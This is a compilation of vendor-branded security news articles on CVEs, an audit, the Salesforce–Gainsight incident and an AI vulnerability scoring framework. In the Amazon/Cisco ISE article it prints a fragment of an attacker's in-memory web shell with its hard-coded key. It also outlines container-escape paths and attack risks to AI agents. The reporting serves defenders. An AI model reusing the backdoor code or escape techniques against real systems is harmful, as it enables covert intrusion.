Vulnerabilities News

The Department of Commerce’s vulnerability disclosure program (VDP), designed to protect its public-facing information technology systems, has been deemed “not fully effective” according to a recent audit conducted by the department’s Office of Inspector General (OIG). The audit highlights several shortcomings in the department’s approach to vulnerability disclosure and remediation.  The Commerce Department established its VDP in response to a directive from the Cybersecurity and Infrastructure Security Agency (CISA). This directive required all federal agencies to implement a vulnerability disclosure policy that allows members of the public to identify and report security vulnerabilities in internet-accessible government systems. Such programs are considered a critical component of federal cybersecurity efforts, enabling agencies to leverage external expertise to safeguard digital infrastructure.  However, the OIG’s audit, formally titled Audit of the Department’s Vulnerability Reporting and Resolution Program (Report Number OIG-26-002-A), found that the department’s program fell short in several key areas. “The Department established a vulnerability disclosure program; however, it was not fully effective,” the report states. Specifically, the audit found that not all internet-accessible systems were included in the VDP, testing guidelines restricted the tools public security researchers could use, reported vulnerabilities were not always fully remediated, and remediation deadlines were frequently missed.  Gaps in Remediation and Vulnerability Reporting  The OIG reviewed 71 resolved vulnerability disclosures and found that only 57 (80%) had been fully remediated, leaving 14 (20%) unresolved. Moreover, the audit indicated that since 2023, the department failed to meet established deadlines for remediating vulnerabilities approximately 35% of the time. “Without an effective vulnerability disclosure program, the Department cannot protect its internet-accessible systems, leaving them susceptible to potential compromise and exploitation,” the report warned.  The audit also highlighted structural issues with the VDP. The department limited its scope to 64 internet-accessible websites, excluding 22 department-owned or operated sites. Additionally, the contractor managing the VDP portal prohibited the use of automated scanners, tools widely used by public security researchers to detect vulnerabilities.  OIG Recommendations and Next Steps  To address these deficiencies, the OIG issued three recommendations. First, the department should revise its VDP testing scope to align with CISA’s Binding Operational Directive 20-01, which emphasizes including all internet-accessible systems in vulnerability disclosure efforts. Second, the department should update and implement standard operating procedures for vulnerability reporting and resolution to ensure comprehensive remediation across affected systems. Finally, the OIG recommended establishing an automated system to coordinate communication between contractors and bureaus and prompt timely action on delayed remediation efforts.  The Importance of Vulnerability Disclosure Programs (VDPs)  The OIG audit highlights the critical role of vulnerability disclosure programs (VDPs) in federal cybersecurity. CISA has emphasized that a strong VDP allows agencies to detect weaknesses before they are exploited, ensuring that vulnerabilities reported by security researchers are systematically assessed, tracked, and remediated.  Organizations looking to strengthen their cybersecurity posture can leverage platforms like Cyble, a world-leading AI-powered threat intelligence solution. Cyble provides real-time visibility into exposed assets, vulnerabilities, and emerging threats, helping organizations proactively manage risk.  Trusted by enterprises and federal agencies worldwide, Cyble’s AI-driven tools, including Blaze AI, automate threat detection, vulnerability management, and incident response, keeping systems protected before attackers strike.  Book a personalized demo and discover your vulnerabilities with Cyble Today! 

A critical security flaw has been uncovered in Apache Syncope, the widely used open-source identity management system, potentially putting organizations at risk of exposing sensitive password information.   Tracked as CVE-2025-65998, the vulnerability was publicly disclosed on November 24, 2025, by Francesco Chicchiriccò through the official Apache Syncope user mailing list. Credit for discovering the issue goes to Clemens Bergmann of the Technical University of Darmstadt.  Understanding the CVE-2025-65998 Vulnerability  The vulnerability specifically affects Apache Syncope instances configured to store user passwords in their internal database using AES encryption. While this configuration is not enabled by default, organizations that activate it may unknowingly introduce a significant security risk. The system relies on a hard-coded AES key embedded directly in the application’s source code.  This design oversight means that any attacker who gains access to the internal database can easily decrypt stored password values, recovering them in plaintext. This compromise poses a severe risk for account security, allowing unauthorized access, privilege escalation, and lateral movement within affected networks.  It is important to note that this flaw only affects passwords stored using the internal AES encryption feature. Other database attributes encrypted through key management mechanisms remain unaffected, as they use separate AES keys and proper encryption handling.  Affected Versions  Research indicates that multiple versions of Apache Syncope are vulnerable to CVE-2025-65998, including:  Apache Syncope (org.apache.syncope.core:syncope-core-spring) 2.1 through 2.1.14  Apache Syncope (org.apache.syncope.core:syncope-core-spring) 3.0 through 3.0.14  Apache Syncope (org.apache.syncope.core:syncope-core-spring) 4.0 through 4.0.2  Organizations running these versions are strongly advised to upgrade to patched releases—version 3.0.15 or 4.0.3—to mitigate the risk. The update replaces the vulnerable hard-coded AES key approach with a more secure key management process, ensuring that password data cannot be trivially decrypted even if the database is compromised.  Potential Impact  Exploitation of CVE-2025-65998 can have serious operational consequences. Once an attacker accesses the internal database, all passwords stored with the default AES encryption method can be decrypted, exposing users’ credentials.   This breach can lead to unauthorized account logins, elevated privileges, and potential internal movement across systems, amplifying the threat to organizational security. Francesco Chicchiriccò, in the advisory posted to the Apache Syncope mailing list, emphasized the importance of upgrading affected systems promptly:  “Apache Syncope can be configured to store user password values in the internal database with AES encryption, though this is not the default option. When AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker, once obtaining access to the internal database content, to reconstruct the original cleartext password values.”  Clemens Bergmann of the Technical University of Darmstadt is credited with identifying this security gap, bringing attention to the risks associated with embedded AES encryption keys without proper key management.  Mitigation Steps  Administrators should promptly review their Apache Syncope deployments. Systems using AES encryption for internal password storage must be updated to versions 3.0.15 or 4.0.3, and key management practices should be strengthened to avoid hard-coded keys.  Cyble can help organizations proactively identify exposed assets and vulnerabilities, providing AI-powered threat intelligence and automated recommendations to prevent credential compromise.   Protect your organization from vulnerabilities like CVE-2025-65998. Leverage Cyble’s AI-powered threat intelligence to uncover exposed assets, assess risks, and secure your systems. Book a free demo today. 

Grafana Labs has issued a warning regarding a maximum-severity security flaw, identified as CVE-2025-41115, affecting its Enterprise product. The vulnerability can allow attackers to impersonate administrators or escalate privileges if certain SCIM (System for Cross-domain Identity Management) settings are enabled.  According to the company, the issue arises only when SCIM provisioning is activated and configured. Specifically, both the enableSCIM feature flag and the user_sync_enabled option must be set to true. Under these conditions, a malicious or compromised SCIM client could create a user with a numeric externalId that directly maps to an internal account, potentially even an administrative account.  SCIM Mapping Flaw (CVE-2025-41115) Enables Impersonation Risks  In SCIM systems, the externalId attribute functions as a bookkeeping field used by identity providers to track user records. Grafana Labs’ implementation mapped this value directly to the platform’s internal user.uid. Because of this design, a numeric external ID such as “1” could be interpreted as an existing Grafana account. This behavior opens a door for impersonation or privilege escalation, enabling unauthorized users to assume the identity of legitimate internal accounts.  Grafana Labs notes in its documentation that SCIM is intended to simplify automated provisioning and management of users and groups, particularly for organizations relying on SAML authentication. The feature, available in Grafana Enterprise and certain Grafana Cloud plans, remains in Public Preview. As a result, breaking changes may occur, and administrators are encouraged to test the feature thoroughly in non-production environments before deployment.  SAML Alignment Required to Prevent Authentication Mismatches  A major security requirement highlighted by Grafana Labs involves the alignment between the SCIM externalId and the identifier used in SAML authentication. SCIM provisioning relies on a stable identity provider attribute, such as Entra ID’s user.objectid, which becomes the external ID in Grafana. SAML authentication must use the same unique identifier, delivered through a SAML claim, to ensure proper account linkage.  If these identifiers do not match, Grafana may fail to associate authenticated SAML sessions with the intended SCIM-provisioned accounts. This mismatch can allow attackers to generate crafted SAML assertions that result in unauthorized access or impersonation. The company recommends using the assertion_attribute_external_uid setting to guarantee that Grafana reads the precise identity claim required to maintain secure user associations.  To reduce risk, Grafana requires organizations to use the same identity provider for both user provisioning and authentication. Additionally, the SAML assertion exchange must include the correct userUID claim to ensure the system can link the session to the appropriate SCIM entry.  Configuration Requirements, Supported Workflows, and Automation Capabilities  Administrators can set up SCIM in Grafana through the user interface, configuration files, or infrastructure-as-code tools such as Terraform. The UI option, available to Grafana Cloud users, applies changes without requiring a restart and allows more controlled access through restricted authentication settings.  Grafana’s SCIM configuration includes options for enabling user synchronization (user_sync_enabled), group synchronization (group_sync_enabled), and restricting access for accounts not provisioned through SCIM (reject_non_provisioned_users). Group sync cannot operate alongside Team Sync, though user sync can. Supported identity providers include Entra ID and Okta.  SCIM provisioning streamlines user lifecycle tasks by automating account creation, updates, deactivation, and team management, reducing manual administrative work and improving security. Grafana notes that SCIM offers more comprehensive, near real-time automation than alternatives such as Team Sync, LDAP Sync, Role Sync, or Org Mapping.  Grafana Labs is urging organizations to review their SCIM and SAML identifier mappings immediately, warning that inconsistencies may lead to unauthorized access scenarios tied to CVE-2025-41115.  In parallel, cybersecurity intelligence leaders such as Cyble continue tracking identity-related risks and misconfigurations across global environments. Security teams looking to strengthen visibility, detect threats earlier, and reduce exposure can explore Cyble’s capabilities, book a free demo to see how Cyble’s AI-driven threat intelligence enhances defense across cloud, endpoints, and identity systems. 

Salesforce has issued a new update on the ongoing Salesforce Gainsight security incident, confirming additional details about the unusual activity detected across Gainsight-published applications connected to the CRM platform. The company reiterated that the incident stemmed from the app’s external integration with Salesforce rather than any vulnerability in the Salesforce core platform. Salesforce Confirms Expanded Investigation In its latest advisory, Salesforce stated that the unusual activity affecting Gainsight applications may have enabled unauthorized access to certain customers’ Salesforce data through the app-to-Salesforce connection. As part of its precautionary measures, Salesforce revoked all active access and refresh OAuth tokens associated with Gainsight-published applications and removed the apps from its AppExchange. While initial communication referenced only three affected customers, Salesforce confirmed on November 21 that the list has expanded, and all newly identified impacted customers have been notified directly. Salesforce emphasized that a broader investigation is underway and continues to provide updates on its official Help portal. Source: Salesforce Gainsight Products and Connectors Temporarily Impacted According to Gainsight’s latest communication, several of its products, including Gainsight CS, Community (CC), Northpass (CE), Skilljar (SJ), and Staircase (ST), have been affected by Salesforce’s precautionary disconnection. Although the products remain operational, they are currently unable to read or write data to Salesforce. In addition, several third-party connectors integrated with Gainsight, such as Gong.io, Zendesk, and HubSpot, have been temporarily disabled by their respective vendors out of an abundance of caution. Gainsight urged customers to rotate their S3 keys if they have not done so since November 20, 2025, as part of the secure log retrieval process. No Indication of Salesforce Platform Vulnerability Salesforce reiterated that there is no evidence suggesting the issue originated from a flaw within the Salesforce platform itself. Instead, the activity appears tied to the external OAuth-based connection between Gainsight applications and Salesforce environments. Crucially, Salesforce confirmed that while the OAuth tokens have been revoked, historical audit trails and logs remain intact, enabling full customer-led investigation efforts. The company also strongly encouraged customers to conduct thorough log reviews using Setup Audit Trail, Event Monitoring logs, and API activity records. Salesforce referenced the Salesforce Log Analysis Guide to support customers in assessing potential compromise indicators. Indicators of Compromise Published As part of its transparency efforts, Salesforce shared a list of Indicators of Compromise (IOCs) associated with the threat activity. These include several user agents—such as python-requests/2.32.3 and Salesforce-Multi-Org-Fetcher/1.0—and dozens of IP addresses linked to suspicious access attempts. Gainsight echoed Salesforce’s recommendations and is conducting its own forensic review with support from independent investigators. Both organizations confirmed that the Salesforce Gainsight security incident remains under active investigation. Gainsight has published a detailed timeline and continues to coordinate with Salesforce to determine the full impact. Customers seeking assistance have been directed to Salesforce Help and Gainsight Support for further updates.

According to the Indian Computer Emergency Response Team (CERT-In), thousands of households, small offices, and service providers across the country may already be at risk due to a newly uncovered authentication bypass flaw tracked as CVE-2025-59367. India’s national cybersecurity agency has issued a security alert after identifying a severe vulnerability in several widely used Asus DSL-series WiFi routers. The warning, published in CERT-In Vulnerability Note CIVN-2025-0322, outlines how remote attackers could infiltrate specific router models without user involvement. The affected devices include the Asus DSL-AC51, DSL-N16, and DSL-AC750, three routers that are common in home and SOHO environments relying on DSL internet connections.  CERT-In states that the flaw enables an attacker to bypass login controls and gain unrestricted access to the router’s administrative interface. Once the router is compromised, the intruder could alter configuration settings, observe or reroute internet traffic, intercept personal or financial information, or even compromise connected devices. The agency describes the risks to confidentiality, integrity, and availability as “critical.”  CVE-2025-59367 Enables Authentication Bypass and Network Compromise  In its advisory, CERT-In explains that a “vulnerability has been reported in ASUS DSL series routers that allows a remote attacker to gain unauthorized access into the affected system.” The agency notes that the issue affects the DSL-AC51, DSL-N16, and DSL-AC750 models and warns that successful exploitation could result in unauthorized access, modification of configuration parameters, access to sensitive information transmitted through the router, and compromise of connected systems.  The advisory is targeted at IT and network administrators, SOC analysts, SMB operators, home and SOHO users, and managed service providers or ISPs, highlighting the widespread nature of the vulnerability. CERT-In’s assessment reiterates that the authentication bypass flaw, identified as CVE-2025-59367, poses direct threats to data confidentiality and system integrity.  The report also details the broader context of the Asus DSL series line, explaining that these devices serve as integrated modem-router units for environments dependent on DSL connections. Because these routers often operate as central networking hubs, any breach may expose all devices and data flowing through the network.  The advisory includes a directive: “Apply appropriate security updates as mentioned in: https://www.asus.com/security-advisory.” CERT-In urges users to immediately install the firmware patches that Asus has begun releasing for the affected models. The agency also recommends that users change default passwords, disable remote management functions unless necessary, and review router security settings for any misconfigurations. Monitoring router logs for abnormalities has also been emphasized as a crucial preventive step.  Conclusion   Asus rolls out patches for the authentication bypass flaw CVE-2025-59367; CERT-In is urging all users of affected DSL-series routers to apply updates immediately. The agency has reiterated the seriousness of the vulnerability and advised users to review their router settings, update firmware through the Asus security advisory page, and remain alert to suspicious activity. Incidents like CVE-2025-59367 show how essential it is for organizations to have reliable insight into new vulnerabilities. Cyble supports this need through detailed vulnerability intelligence, helping teams identify high-risk issues, track exploit activity, and prioritize remediation across assets and products. Its intelligence goes beyond standard CVE and NVD listings, offering context on exploits, attack methods, and threat actor discussions.  Schedule a personalized demo with Cyble to assess how its intelligence platform can support your security operations. 

A newly discovered security flaw, identified as CVE-2025-11001, is targeting users across both public and private sectors. The vulnerability, affecting all versions of 7-Zip before 25.00, allows attackers to execute malicious code remotely, potentially compromising critical systems. NHS Digital issued a cyber alert urging organizations and users to take immediate action.  Details of the CVE-2025-11001 Vulnerability CVE-2025-11001 is classified as a file-parsing directory traversal remote code execution vulnerability. With a CVSS score of 7.0, the flaw is considered high severity. Exploitation occurs through 7-Zip’s handling of symbolic links during the extraction of archive files. By crafting malicious archives, attackers can manipulate 7-Zip to write files outside the intended extraction directory. This misbehavior enables the placement of executable files in sensitive system locations, which can then be triggered to execute arbitrary code.  Security researchers have released a proof-of-concept (PoC) exploit demonstrating how CVE-2025-11001 can be leveraged. While the PoC does not constitute a fully weaponized attack, it lowers the barrier for cybercriminals, making unpatched systems increasingly vulnerable.  Impact and Threat Assessment All 7-Zip versions before 25.00 are at risk, which includes a vast number of enterprise systems, government agencies, and personal computers. The NHS Digital cybersecurity team has classified this issue as Threat ID CC-4719 with medium severity, highlighting the urgent need for patching.  Although initial reports suggested active exploitation in the wild, a subsequent update on November 20, 2025, clarified that no confirmed exploitation of CVE-2025-11001 has been observed by NHS England’s National Cyber Security Operations Centre (CSOC). The National CSOC did confirm the existence of the public PoC exploit and indicated that potential exploitation remains likely in the future if systems are left unpatched.  Given the deployment of 7-Zip across multiple environments, the potential attack surface is significant. A successful attack could allow unauthorized access to sensitive systems and facilitate the deployment of additional malware payloads.  Remediation and Recommendations In response to CVE-2025-11001, 7-Zip released version 25.00, which addresses the vulnerability and mitigates the risk of remote code execution via malicious archive files. Organizations and individual users are strongly advised to upgrade immediately. Delaying the update leaves systems exposed to potential threats that could be exploited once more attacks emerge.  System administrators should prioritize updating all endpoints and servers running vulnerable 7-Zip versions. Implementing this patch eliminates the directory traversal flaw, effectively neutralizing the possibility of arbitrary code execution through symbolic link abuse.  Conclusion CVE-2025-11001 is a high-severity 7-Zip vulnerability. While NHS systems haven’t seen confirmed exploitation, the public proof-of-concept raises the risk. Organizations should update to 7-Zip 25.00 or later and report incidents to NHS Digital.  To stay protected from threats like CVE-2025-11001, Cyble provides AI-driven vulnerability intelligence, helping organizations prioritize and patch critical risks before they are exploited. Schedule a personalized demo with Cyble to protect your systems today. 

Amazon’s threat intelligence division has revealed a cyber-espionage campaign involving an advanced persistent threat (APT) group exploiting previously undisclosed zero-day vulnerabilities in systems from Cisco and Citrix. The investigation showed that the attackers specifically targeted critical identity and network access control infrastructure; components of enterprises rely on managing authentication and enforcing security policies across their networks.  The initial discovery came from Amazon’s MadPot honeypot service, which detected exploitation attempts of the Citrix “Bleed Two” vulnerability, now tracked as CVE-2025-5777, before it had been made public. This early detection confirmed that the APT had been using the flaw as a zero-day vulnerability.  Further analysis linked the same threat actor to another zero-day vulnerability within Cisco Identity Service Engine (ISE). Amazon shared details of a suspicious payload with Cisco, which led to the identification of a flaw in the deserialization logic of an undocumented Cisco ISE endpoint.   The vulnerability, now designated CVE-2025-20337, allowed pre-authentication remote code execution, granting attackers administrator-level access to affected systems. What raised additional alarm was that this exploitation occurred before Cisco had assigned a CVE number or released patches. Deployment of a Custom Web Shell  Following the successful compromise of targeted systems, the threat actor deployed a custom-built web shell disguised as a legitimate Cisco ISE component called IdentityAuditAction. Unlike typical off-the-shelf malware, this backdoor was tailored specifically for Cisco ISE environments.  Amazon’s investigation revealed that the web shell operated entirely in-memory, leaving minimal traces for forensic analysis. It used Java reflection to inject itself into active threads, registered as an HTTP listener on the Tomcat server to intercept all HTTP requests, and encrypted its communication with DES encryption using non-standard Base64 encoding. Accessing the shell required knowledge of specific HTTP headers, further obscuring its presence.  The following snippet from the deserialization routine demonstrates the actor’s authentication mechanism for accessing the backdoor:  if (matcher.find()) {    requestBody = matcher.group(1).replace(“*”, “a”).replace(“$”, “l”);    Cipher encodeCipher = Cipher.getInstance(“DES/ECB/PKCS5Padding”);    decodeCipher = Cipher.getInstance(“DES/ECB/PKCS5Padding”);    byte[] key = “d384922c”.getBytes();    encodeCipher.init(1, new SecretKeySpec(key, “DES”));    decodeCipher.init(2, new SecretKeySpec(key, “DES”));    byte[] data = Base64.getDecoder().decode(requestBody);    data = decodeCipher.doFinal(data);    ByteArrayOutputStream arrOut = new ByteArrayOutputStream();    if (proxyClass == null) {        proxyClass = this.defineClass(data);    } else {        Object f = proxyClass.newInstance();        f.equals(arrOut);        f.equals(request);        f.equals(data);        f.toString();    } }   Defensive Measures for CVE-2025-20337 and CVE-2025-5777  The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 demonstrates the growing trend of APTs focusing on identity and access control infrastructure as high-value targets. According to Amazon, the attacks were indiscriminate and internet-facing, meaning any unpatched or exposed systems were at risk during the campaign.  The “patch-gap” exploitation, attacking systems in the window before vendors can issue fixes, highlights a persistent challenge in enterprise cybersecurity. Such tactics are commonly used by well-funded threat groups that possess advanced research capabilities or access to undisclosed vulnerability data.  Amazon emphasized that even well-maintained systems can fall victim to pre-authentication zero-days, denoting the need for defense-in-depth strategies. Security teams are advised to:  Restrict access to privileged security appliance endpoints like Cisco ISE and Citrix management portals through network segmentation and firewalls.  Closely monitor for anomalous activity, such as unrecognized HTTP listeners, unusual in-memory processes, or encryption anomalies.  Stay current with vendor advisories and threat intelligence feeds regarding emerging zero-day vulnerabilities.  Minimize public internet exposure of critical identity and network control systems, routing access through VPNs or isolated management interfaces.  Conclusion  Amazon’s findings reveal how today’s threat actors are targeting identity and access systems as key entry points. By exploiting CVE-2025-5777 in Citrix and CVE-2025-20337 in Cisco ISE, attackers demonstrated both precision and intent.  Cyble helps enterprises stay ahead of such threats with its advanced Vulnerability Management platform. By monitoring emerging zero-days, prioritizing patches by risk, and offering deep insights into active exploits, Cyble empowers security teams to act before attackers do.  Schedule a demo to discover how its AI-driven intelligence can strengthen your defense against modern cyber threats. 

Microsoft’s November Patch Tuesday release for 2025 has delivered fixes for 63 security flaws across its software portfolio, including one zero-day vulnerability already being exploited in the wild. The company’s monthly update also contains four “Critical” vulnerabilities, two involving remote code execution (RCE), one linked to privilege escalation, and another tied to information disclosure.  This month’s update addresses vulnerabilities across a wide range of Microsoft products and services. Although the number of vulnerabilities is lower compared to recent months, the presence of an active zero-day makes November’s cycle critical for administrators. Microsoft noted that some of the “Important” rated flaws could still be leveraged in complex attack chains, particularly those affecting widely deployed components like Office, Windows Kernel, and Azure services.  Actively Exploited Zero-Day: CVE-2025-62215  The most urgent issue this month is CVE-2025-62215, an Elevation of Privilege vulnerability in the Windows Kernel. According to Microsoft, the flaw arises from a race condition that allows an authenticated attacker to gain SYSTEM-level privileges on affected systems.  In Microsoft’s technical explanation, “concurrent execution using a shared resource with improper synchronization” could let an attacker win a race condition and escalate privileges locally. This vulnerability was discovered by the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC). While the company has confirmed that it is being exploited in the wild, it has not provided details about the attack methods or affected threat actors.  The vulnerability notes a recurring challenge for Windows systems: race conditions within kernel operations can provide attackers with direct pathways to full administrative control if not properly mitigated. Patching this CVE should therefore be a top priority for enterprise and government environments.  Other High-Severity CVEs and Products Affected  Beyond the zero-day, four additional vulnerabilities have been classified as Critical. These include remote code execution vulnerabilities in components like Microsoft Office and Visual Studio, which could allow attackers to execute malicious code if users open specially crafted files or interact with compromised projects.  CVE-2025-62199: A critical RCE vulnerability in Microsoft Office that can trigger upon viewing or opening a malicious document. This flaw is particularly dangerous because it can be exploited through the Outlook Preview Pane, requiring no additional user interaction.  CVE-2025-60724: A heap-based buffer overflow in the Microsoft Graphics Component (GDI+) that could potentially allow remote code execution across multiple applications.  CVE-2025-62214: A Visual Studio CoPilot Chat extension flaw enabling remote code execution through a complex multi-stage exploitation chain involving prompt injection and build triggering.  CVE-2025-59499: An elevation of privilege issue in Microsoft SQL Server that enables attackers to execute arbitrary Transact-SQL commands with elevated permissions.  The November Patch Tuesday also covers vulnerabilities across a variety of Microsoft services, including Azure Monitor Agent, Windows DirectX, Windows OLE, Dynamics 365, OneDrive for Android, and several networking components such as WinSock and RRAS (Routing and Remote Access Service).  While five of these vulnerabilities are rated “Critical,” most are considered “Important,” reflecting Microsoft’s evaluation of exploitation complexity and impact. Nonetheless, even lower-rated CVEs can pose severe threats when combined with social engineering or used in chained attacks.  Windows 11 Updates and Lifecycle Changes  Alongside security fixes, the November 2025 Windows 11 Patch Tuesday (build 26200.7121, update KB5068861) introduces new features and UI enhancements. These include a redesigned Start menu that allows more app pinning, a customizable “All Apps” view, and visual changes to the Taskbar’s battery icon, which can now display color indicators and percentage values.  The update also resolves several performance and stability issues, such as Task Manager continuing to run in the background after closure, and connectivity problems in certain gaming handheld devices. Storage reliability, HTTP request parsing, and voice access setup have also been improved.  Additionally, this update coincides with the end of support for Windows 11 Home and Pro version 23H2, making a small but notable shift in Microsoft’s lifecycle policy. Users running older CPUs that lack support for the new instruction sets required by Windows 11 24H2 may need to consider hardware upgrades or extended support programs.  The Importance of Prompt Patching  November’s updates, though fewer in number, address several vulnerabilities with serious potential consequences if left unpatched. Administrators are urged to prioritize systems exposed to the internet or running affected components, especially those related to the Windows Kernel, Microsoft Office, and Visual Studio.  With one confirmed exploited zero-day and multiple critical RCE vulnerabilities, Microsoft Patch Tuesday for November 2025 serves as a reminder that timely patch deployment remains one of the most effective defenses against cyber threats. Organizations should also monitor system logs and intrusion detection systems for signs of exploitation and ensure that legacy or unsupported devices receive compensating controls.  The November Patch Tuesday highlights the nature of vulnerabilities that can harm even the most protected systems. With an actively exploited zero-day and several critical vulnerabilities addressed, timely patching remains essential for reducing cyber risk.  To strengthen defenses beyond standard patch cycles, organizations can leverage Cyble’s Vulnerability Management platform. Cyble continuously monitors emerging exploits and zero-day vulnerabilities, providing in-depth intelligence that helps teams prioritize patching by risk level and uncover issues not listed even in the most popular databases. Its insights into exploitation methods, dark web chatter, and mitigation options enable proactive threat prevention. Want to find vulnerabilities before threat actors do?   Schedule a personalized demo today and see how Cyble can enhance your organization’s security posture. 

Security researchers have revealed three serious vulnerabilities in runC, the Open Container Initiative (OCI)-compliant runtime that powers platforms such as Docker and Kubernetes, which could allow attackers to break container isolation and gain control of the host system. The flaws, tracked as CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881, stem from weaknesses in how runC manages temporary bind mounts, symbolic links (symlinks), and certain write operations. Together, they can be exploited to achieve complete container escapes and even host-level compromises.  According to the U.S. National Vulnerability Database (NVD) and the runC project’s own advisories, these vulnerabilities arise from logic and race-condition errors within runC’s path resolution and mount handling. The issue occurs when runC attempts to mask access to restricted files by bind-mounting safe inodes such as /dev/null or /dev/console.   If an attacker introduces a symlink or triggers a race condition during container initialization, the runtime may accidentally mount an attacker-specified target path, granting write access to critical host system files. This misconfiguration can expose kernel interfaces such as /proc/sys/kernel/core_pattern or /proc/sysrq-trigger, which, if modified, can be used to crash the host or escape the container environment entirely.  Aleksa Sarai, a developer at SUSE and member of the OCI Technical Board, explained that runC’s method for masking files is vulnerable because of how it interacts with symbolic links during initialization. “If an attacker places a symlink at the right time, runC may inadvertently mount an attacker-defined target, creating dangerous write access to critical kernel interfaces in /proc,” Sarai warned. The advisories emphasize that all three vulnerabilities could permit full container breakouts by bypassing runC’s intended restrictions.  Details of all the Vulnerabilities: CVE-2025-31133, CVE-2025-52565 and CVE-2025-52881  CVE-2025-31133 involves how runC implements “masked paths.” When the runtime bind-mounts /dev/null over a file to block access, an attacker can replace /dev/null with a symlink to a sensitive host file. This can cause runC to mount that host path as read-write, enabling an attacker to alter kernel parameters or trigger system crashes through /proc/sysrq-trigger. This vulnerability impacts all known versions of runC before the latest patches.  CVE-2025-52565 is a similar issue that targets /dev/console mounts. When runC attempts to bind /dev/console to /dev/pts/$n, an attacker who replaces /dev/pts/$n with a symlink can cause the bind-mount to target a different file. This vulnerability affects all versions of runC from 1.0.0-rc3 onward. Like CVE-2025-31133, it can be exploited to create read-write binds to critical procfs files, resulting in container breakout. The flaw has a CVSS score of 7.3.  While addressing CVE-2025-52565, developers also identified potential risks in how runC used file creation functions. Though these were not directly exploitable, fixes were included as a precaution. Additional mitigations were also applied to reduce race conditions in /dev/pts/$n, even though they are largely hypothetical in most deployments. CVE-2025-52881 represents a more advanced attack vector that builds on previous runC vulnerabilities. It allows an attacker to redirect write operations within procfs, bypassing Linux Security Module (LSM) protections such as AppArmor and SELinux. This could enable malicious writes to files like /proc/sysrq-trigger, causing host crashes, or to /proc/sys/kernel/core_pattern, facilitating a container escape. This vulnerability affects all known versions of runC and has a CVSS score of 7.3. Researchers note that CVE-2025-52881 can pair with the other two flaws to simplify exploitation, acting as an LSM bypass that allows arbitrary writes to host files.  Fixes, Versions, and Mitigation  The vulnerabilities have been addressed in runC v1.2.8, v1.3.3, and v1.4.0-rc.3. The patches introduce extensive code changes not only to runC itself but also to the supporting library filepath-securejoin, which handles secure path resolution. Maintainers strongly advise vendors and users to upgrade directly to these versions rather than applying individual patches, as the fixes are interdependent and cover overlapping issues across the three CVEs.  Recommended mitigations include:  By preventing the host root user from being mapped inside the container, unauthorized writes to procfs files are blocked by standard Unix permissions.  Containers should be configured with restricted privileges, and setuid binaries should be disabled using the noNewPrivileges flag.  SELinux may help limit exposure in certain cases, but CVE-2025-52881 can bypass LSM protections, making AppArmor or SELinux alone insufficient.  While these mitigations reduce exposure, immediate upgrades remain the most effective defense. The advisories caution that CVE-2025-52881 can undermine even strong LSM-based defenses if the runtime is not patched.  Conclusion  The recent runC vulnerabilities and coordinated fixes across runtimes demonstrate the critical need for proactive, intelligence-driven cybersecurity. Organizations using Docker, Kubernetes, or other OCI-based platforms should promptly upgrade to the patched versions (v1.2.8, v1.3.3, or v1.4.0-rc.3) and carefully review container privileges to reduce risk. The research contributions from Lei Wang, Li Fubang, Tõnis Tiigi, and Aleksa Sarai highlight the importance of cross-runtime collaboration to prevent container escapes.  Complementing these efforts, Cyble’s AI-Native Threat Intelligence Platform, including Blaze AI, provides autonomous monitoring of vulnerabilities, threat prediction, and remediation, enabling security teams to stay ahead of attacks, protect critical assets, and maintain security defenses in complex containerized environments.  Book a personalized demo to see how Cyble can detect threats and protect your assets in real time. 

A new vulnerability scoring system has just been announced. The initiative, called the AI Vulnerability Scoring System (AIVSS), aims to fill the gaps left by traditional models such as the Common Vulnerability Scoring System (CVSS), which were not designed to handle the complex, non-deterministic nature of modern AI technologies.  AI security expert, author, and adjunct professor Ken Huang introduced the AIVSS framework, emphasizing that while CVSS has long been a cornerstone for assessing software vulnerabilities, it fails to capture the unique threat landscape presented by agentic and autonomous AI systems.  “The CVSS and other regular software vulnerability frameworks are not enough,” Huang explained. “These assume traditional deterministic coding. We need to deal with the non-deterministic nature of Agentic AI.”  Huang serves as co-leader of the AIVSS project working group alongside several prominent figures in cybersecurity and academia, including Zenity Co-Founder and CTO Michael Bargury, Amazon Web Services Application Security Engineer Vineeth Sai Narajala, and Stanford University Information Security Officer Bhavya Gupta.   Together, the group has collaborated under the Open Worldwide Application Security Project (OWASP) to develop a framework that provides a structured and measurable approach to assessing AI-related security threats.  According to Huang, Agentic AI introduces unique challenges because of its partial autonomy. “Autonomy is not itself a vulnerability, but it does elevate risk,” he noted. The AIVSS is designed specifically to quantify those additional risk factors that emerge when AI systems make independent decisions, interact dynamically with tools, or adapt their behavior in ways that traditional software cannot.  A New Approach to AI Vulnerability Scoring  The AI Vulnerability Scoring System builds upon the CVSS model, introducing new parameters tailored to the dynamic nature of AI systems. The AIVSS score begins with a base CVSS score and then incorporates an agentic capabilities assessment. This additional layer accounts for autonomy, non-determinism, and tool use, factors that can amplify risk in AI-driven systems. The combined score is then divided by two and multiplied by an environmental context factor to produce a final vulnerability score.  A dedicated portal, available at aivss.owasp.org, provides documentation, structured guides for AI risk assessment, and a scoring tool for practitioners to calculate their own AI vulnerability scores.  Huang highlighted a critical difference between AI systems and traditional software: the fluidity of AI identities. “We cannot assume the identities used at deployment time,” he said. “With agentic AI, you need the identity to be ephemeral and dynamically assigned. If you really want to have autonomy, you have to give it the privileges it needs to finish the task.”   Top Risks in Agentic AI Systems  The AIVSS project has also identified the ten most severe core security risks for Agentic AI, though the team has refrained from calling it an official “Top 10” list. The current risks include:  Agentic AI Tool Misuse  Agent Access Control Violation  Agent Cascading Failures  Agent Orchestration and Multi-Agent Exploitation  Agent Identity Impersonation  Agent Memory and Context Manipulation  Insecure Agent Critical Systems Interaction  Agent Supply Chain and Dependency Attacks  Agent Untraceability  Agent Goal and Instruction Manipulation  Each of these risks reflects the interconnected and compositional nature of AI systems. As the draft AIVSS document notes, “Some repetition across entries is intentional. Agentic systems are compositional and interconnected by design. To date, the most common risks such as Tool Misuse, Goal Manipulation, or Access Control Violations, often overlap or reinforce each other in cascading ways.”  Huang provided an example of how this manifests in practice: “For tool misuse, there shouldn’t be a risk in selecting a tool. But in MCP systems, there is tool impersonation, and also insecure tool usage.”